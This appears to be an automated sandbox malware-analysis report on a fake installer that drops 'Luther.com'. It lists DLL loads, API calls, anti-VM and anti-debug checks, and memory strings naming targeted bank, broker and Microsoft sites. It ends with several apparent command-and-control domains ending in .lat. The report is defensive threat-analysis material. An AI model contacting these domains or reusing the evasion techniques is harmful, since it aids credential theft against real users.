                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: installer_1.05_37.4.exeStatic file information: File size 1120175 > 1048576
                Source: installer_1.05_37.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                Source: installer_1.05_37.4.exeStatic PE information: real checksum: 0x11513a should be: 0x11be2a
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E50DE6 push ecx; ret 13_2_00E50DF9

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\224553\Luther.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\224553\Luther.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EC26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_00EC26DD
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E4FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_00E4FC7C
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_13-102938
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comAPI coverage: 3.7 %
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com TID: 7980Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00E9DC54
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00EAA087
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00EAA1E2
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00E9E472
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00EAA570
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA66DC FindFirstFileW,FindNextFileW,FindClose,13_2_00EA66DC
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E6C622 FindFirstFileExW,13_2_00E6C622
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00EA73D4
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA7333 FindFirstFileW,FindClose,13_2_00EA7333
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00E9D921
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E35FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,13_2_00E35FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224553Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224553\Jump to behavior
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Luther.com, 0000000D.00000002.4497214664.00000000013EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX8
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAF4FF BlockInput,13_2_00EAF4FF
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E3338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,13_2_00E3338B
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E55058 mov eax, dword ptr fs:[00000030h]13_2_00E55058
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E920AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,13_2_00E920AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E62992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00E62992
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E50BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00E50BAF
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E50D45 SetUnhandledExceptionFilter,13_2_00E50D45
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E50F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00E50F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: finickypwk.lat
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shoefeatthe.lat
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: savorraiykj.lat
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: kickykiduz.lat
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: miniatureyu.lat
                Source: Luther.com, 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: leggelatez.lat
